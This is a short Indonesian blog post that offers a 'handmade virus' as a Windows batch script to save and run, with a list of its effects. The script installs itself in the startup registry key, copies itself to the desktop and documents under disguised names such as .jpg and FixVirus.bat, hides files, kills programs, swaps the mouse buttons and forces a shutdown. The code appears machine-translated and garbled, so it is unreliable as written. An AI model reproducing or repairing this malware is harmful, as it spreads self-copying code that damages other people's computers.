Cari Blog Ini

Rabu, 24 November 2010

[virus]HANDMADE virus

Cukup copy dan paste kode yang diberikan di bawah ini dalam notepad dan menyimpannya sebagai anyname.bat (bukan txt)
Hati-hati & Jangan jalankan pada pc ur

@ Echo off
warna 4
judul 4
judul R.I.P
mulai
mulai
mulai
mulai calc
copy% 0% Systemroot% \ Greatgame> nul
reg add HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run / Greatgame v / t REG_SZ
/ D% systemroot% \ Greatgame.bat / f> nul
Copy% 0 *. bat> nul
Attrib + r + h Greatgame.bat
Attrib + r + h
Rundll32 USER32.DLL.SwapMouseButton

mulai calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
mulai
cls
cd% userprofile% \ desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd% userprofile% My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
mulai
mulai calc
cls
msg * R.I.P
msg * R.I.P
shutdown-r-t 10-c "VIRUS TERDETEKSI"
mulai
mulai
waktu 12:00
: R.I.P
cd%% usernameprofile \ desktop
copy% acak Greatgame.bat%. kelelawar
goto RIP


-------------------------------------------------- ----------------------------------------
Ini akan
1) Salin dirinya ke startup
2) Salin sendiri lebih dari seribu kali ke tempat acak di komputer Anda
3) Sembunyikan diri dan semua file yang dibuat lainnya
4) Tugas membunuh MSN, Norton, Windows Explorer, Limewire.
5) Swap tombol kiri mouse dengan orang yang tepat
6) Membuka kotak peringatan
7) Perubahan waktu untuk 12:00 dan menutup komputer

0 komentar:

Posting Komentar